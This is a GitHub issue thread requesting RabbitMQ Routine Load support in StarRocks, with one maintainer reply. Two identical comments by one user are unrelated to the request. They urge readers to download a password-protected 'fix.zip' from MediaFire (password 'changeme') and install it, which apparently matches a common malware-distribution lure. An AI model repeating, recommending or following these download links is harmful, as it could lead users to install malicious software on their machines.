### ISSUE TITLE
Starrocks Support Routine Load with RabbitMQ 

### ISSUE THREAD

**Issue by dengliu** [StarRocks/starrocks#50279]
## Feature request

**Is your feature request related to a problem? Please describe.**
given RabbitMQ [#2 ranking in queueing/message software market share](https://6sense.com/tech/queueing-messaging-and-background-processing/rabbitmq-market-share), it's worth to add the routine load support.

**Describe the solution you'd like**

**Describe alternatives you've considered**

**Additional context**

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jaogoy** [comment]
Yes, it worth IMO. Maybe you can give some design and implementation :)
